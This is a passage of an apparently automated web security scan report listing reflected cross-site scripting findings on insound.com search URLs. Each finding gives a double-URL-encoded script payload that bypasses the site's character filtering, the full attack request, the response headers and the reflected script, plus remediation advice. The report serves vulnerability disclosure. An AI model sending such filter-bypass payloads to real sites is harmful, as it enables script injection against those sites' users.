User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=mrdo3d27bb8v83fiqk01e4pqm6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:38 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=254220049; expires=Sun, 09-Jan-2011 02:37:38 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=94245834; expires=Sun, 09-Jan-2011 02:37:38 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Drake6b0e8</title><script>alert(1)</script>17722ee5f98</title>
...[SNIP]...

1.132. http://www.insound.com/search/query/Drake&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Drake&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5587e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a86562e007 was submitted in the REST URL parameter 3. This input was echoed as 5587e"><script>alert(1)</script>0a86562e007 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Drake5587e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a86562e007&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=nej7ac2kbjsvkap3o4nb9anjm0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=451027190; expires=Sun, 09-Jan-2011 02:37:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=158230381; expires=Sun, 09-Jan-2011 02:37:33 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Drake5587e"><script>alert(1)</script>0a86562e007" />
...[SNIP]...

1.133. http://www.insound.com/search/query/Flying%20Lotus&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Flying%20Lotus&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 1e953%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e58a6476d267 was submitted in the REST URL parameter 3. This input was echoed as 1e953</title><script>alert(1)</script>58a6476d267 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Flying%20Lotus1e953%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e58a6476d267&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=airj5deos56mpe6rl5qpeetdg7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=277153693; expires=Sun, 09-Jan-2011 02:38:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=45202073; expires=Sun, 09-Jan-2011 02:38:16 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Flying Lotus1e953</title><script>alert(1)</script>58a6476d267</title>
...[SNIP]...

1.134. http://www.insound.com/search/query/Flying%20Lotus&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Flying%20Lotus&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5bce%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f471c48308 was submitted in the REST URL parameter 3. This input was echoed as b5bce"><script>alert(1)</script>3f471c48308 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Flying%20Lotusb5bce%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f471c48308&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=kb4l5fao94snb98jem7okc4il6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=247799154; expires=Sun, 09-Jan-2011 02:38:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=56753403; expires=Sun, 09-Jan-2011 02:38:10 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Flying Lotusb5bce"><script>alert(1)</script>3f471c48308" />
...[SNIP]...

1.135. http://www.insound.com/search/query/Forest%20Swords&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Forest%20Swords&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 263a0%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef6a342b52bf was submitted in the REST URL parameter 3. This input was echoed as 263a0</title><script>alert(1)</script>f6a342b52bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Forest%20Swords263a0%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef6a342b52bf&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=43a31v6fb6ro13t21un80md8g6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=423200647; expires=Sun, 09-Jan-2011 02:40:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=478293011; expires=Sun, 09-Jan-2011 02:40:08 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Forest Swords263a0</title><script>alert(1)</script>f6a342b52bf</title>
...[SNIP]...

1.136. http://www.insound.com/search/query/Forest%20Swords&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Forest%20Swords&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e41bf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef44313cac23 was submitted in the REST URL parameter 3. This input was echoed as e41bf"><script>alert(1)</script>f44313cac23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Forest%20Swordse41bf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef44313cac23&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=mcila420ipfcvoubuipg952up2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=173658230; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=330822554; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Forest Swordse41bf"><script>alert(1)</script>f44313cac23" />
...[SNIP]...

1.137. http://www.insound.com/search/query/Games&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Games&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d9a4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a5df2f5553 was submitted in the REST URL parameter 3. This input was echoed as 3d9a4"><script>alert(1)</script>9a5df2f5553 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Games3d9a4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a5df2f5553&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=fb902htu49c0sqdhbuv2l24g31; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=9770952; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=208473242; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Games3d9a4"><script>alert(1)</script>9a5df2f5553" />
...[SNIP]...

1.138. http://www.insound.com/search/query/Games&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Games&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 51c62%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee7e68549e5 was submitted in the REST URL parameter 3. This input was echoed as 51c62</title><script>alert(1)</script>ee7e68549e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Games51c62%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee7e68549e5&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=9cvn5tqlgale24cprsgpoae0r7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=220366601; expires=Sun, 09-Jan-2011 02:41:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=547788850; expires=Sun, 09-Jan-2011 02:41:13 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Games51c62</title><script>alert(1)</script>ee7e68549e5</title>
...[SNIP]...

1.139. http://www.insound.com/search/query/Gatekeeper&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Gatekeeper&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload e0970%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea57d42ed4d0 was submitted in the REST URL parameter 3. This input was echoed as e0970</title><script>alert(1)</script>a57d42ed4d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Gatekeepere0970%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea57d42ed4d0&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=uar5ne88ecl4r5ujiqo2rqor33; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=136754500; expires=Sun, 09-Jan-2011 02:41:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=558758331; expires=Sun, 09-Jan-2011 02:41:14 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Gatekeepere0970</title><script>alert(1)</script>a57d42ed4d0</title>
...[SNIP]...

1.140. http://www.insound.com/search/query/Gatekeeper&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Gatekeeper&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6d515183e90 was submitted in the REST URL parameter 3. This input was echoed as e0b53"><script>alert(1)</script>6d515183e90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Gatekeepere0b53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6d515183e90&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=m53809ukru8c34mb96vlbgjm62; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=266628450; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=344487155; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Gatekeepere0b53"><script>alert(1)</script>6d515183e90" />
...[SNIP]...

1.141. http://www.insound.com/search/query/Girl%20Talk&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Girl%20Talk&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1c97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e836d5d1bf12 was submitted in the REST URL parameter 3. This input was echoed as c1c97"><script>alert(1)</script>836d5d1bf12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Girl%20Talkc1c97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e836d5d1bf12&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=285ii58ass3npil0j43glorcb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=34351931; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=193914455; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Girl Talkc1c97"><script>alert(1)</script>836d5d1bf12" />
...[SNIP]...

1.142. http://www.insound.com/search/query/Girl%20Talk&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Girl%20Talk&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 2f89b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7d249cd0eee was submitted in the REST URL parameter 3. This input was echoed as 2f89b</title><script>alert(1)</script>7d249cd0eee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Girl%20Talk2f89b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7d249cd0eee&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2l7i2jaqsa8gr7dkqsu0hrg3s4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=53570078; expires=Sun, 09-Jan-2011 02:40:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=561501986; expires=Sun, 09-Jan-2011 02:40:06 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Girl Talk2f89b</title><script>alert(1)</script>7d249cd0eee</title>
...[SNIP]...

1.143. http://www.insound.com/search/query/Girls&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Girls&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cdce%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0faee6b0d00 was submitted in the REST URL parameter 3. This input was echoed as 8cdce"><script>alert(1)</script>0faee6b0d00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

